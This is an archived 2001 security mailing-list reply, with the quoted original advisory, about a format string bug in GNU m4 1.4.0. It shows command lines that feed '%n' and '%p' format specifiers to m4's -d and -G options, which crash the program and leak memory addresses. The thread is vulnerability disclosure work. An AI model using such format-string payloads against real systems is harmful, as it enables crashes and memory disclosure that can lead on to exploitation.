Vulnerability Development mailing list archives
Re: [Helios Security and Administration::another bug in m4]
From: Knud Erik Hojgaard - CyberCity Support <kain () PERKER DK>
Date: Fri, 23 Feb 2001 11:14:35 +0100
[kain@martin kain]$ mv --version mv (GNU fileutils) 4.0 [kain@martin kain]$ uname -a Linux martin.crap.dk 2.2.16 #1 SMP Sun Jun 25 19:07:46 CEST 2000 i586 unknown [kain@martin kain]$ mv --version mv (GNU fileutils) 4.0 [kain@martin kain]$ m4 -d "`perl -e 'print " %n"x3'`" m4: Segmentation fault [kain@martin kain]$ m4 -G "`perl -e 'print " %p"x4'`" m4: 0x401081cc 0x4000ae60 0xbffffda4 0xbffffd78: No such file or directory sincerely Knud Erik Hojgaard <knud () cybercity dk> Cybercity Erhvervssupport <support () erhverv cybercity dk> http://www.cybercity.dk/support Tlf 33 98 30 60 -----Original Message----- From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of honoriak Sent: 22. februar 2001 18:12 To: VULN-DEV () SECURITYFOCUS COM Subject: [Helios Security and Administration::another bug in m4] [Helios Security and Administration] - Program: m4-1.4.0 - Vulnerability: format string bug - Details: Another format string buf in m4 1.4.0. This time is with -d option, another exists in -G option. In a few days you can see proof of concept exploit, and we explain the part of the code that permits this. - Risk: Low (Nothing). It's not setuid. It's useless but it's a vulnerability of course. - Example: $ m4 -d "`perl -e 'print " %n"x3'`" m4: Segmentation fault (core dumped) $ m4 -G "`perl -e 'print " %p"x4'`" m4: 0x4010848c 0x4000a610 0xbffffc14 0xbffffbe8: No such file or directory signed, -honoriak -- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGP 6.5.1 mQGiBDpPJL4RBADgD/upBcXggrXgXgXLs17zo7gE3YFCXADp7AcEuJZIBnFF/55w x1pLiyMOpgyldEpFJqodNBwz6hEw1Kc9GhbcJpeEdi/lcSpPBcLh4g75djBR2x3C sZhhvUDAladrmFQNQJN7bp1LfITM/c9arjM0L7wvy71JIjG4DLZomJvljwCg/1kd t4kVbLeOgCrdISCAdQUWKz0D/2w8U6CPKQkI2mt7phhBru6YX0BUBlAEVdQSfSZX 5ps01QTsLr3Z46GbYsLZu4bZNqE1NzuM0SgKp6G727v5sSOqPOGIdPMI0wkXhRyg aNru3DEDAV1JrVS6EnzbcPibKddTUBM2U+0zXGuOOphBIqqZZc/7HkP77hRbgkh2 N+yqBADfXpNgiWf1jfFx8whaj6axAf8oNT1wYjpeMOtQZ/izRHAzG/FFpYzGR8j8 Q6BGW+4vtaMAs/VMlGJLUdtZTCaMRAuqtk0dC61Pq5YZNNRctoOrBltXFdKtov8g dI1PyNX14u9y31PVG4hCsrO6aMOI/I2C9GtkVaMNB6rXEB0ck7QbaG9ub3JpYWsg PGhvbm9yaWFrQG1haWwucnU+iQBOBBARAgAOBQI6TyS+BAsDAQICGQEACgkQhT2y uAitIupxJACeMw/biJGU58Xz/C5uTRJw+3AafBUAoJnNA33uPYpFW6Cl/0NfM6o8 p7VDuQMNBDpPJMsQDADMHXdXJDhK4sTw6I4TZ5dOkhNh9tvrJQ4X/faY98h8ebBy HTh1+/bBc8SDESYrQ2DD4+jWCv2hKCYLrqmus2UPogBTAaB81qujEh76DyrOH3SE T8rzF/OkQOnX0ne2Qi0CNsEmy2henXyYCQqNfi3t5F159dSST5sYjvwqp0t8MvZC V7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8b
Current thread:
- [Helios Security and Administration::another bug in m4] honoriak (Feb 22)
- Re: [Helios Security and Administration::another bug in m4] Knud Erik Hojgaard - CyberCity Support (Feb 23)
- Re: [Helios Security and Administration::another bug in m4] Colin Phipps (Feb 23)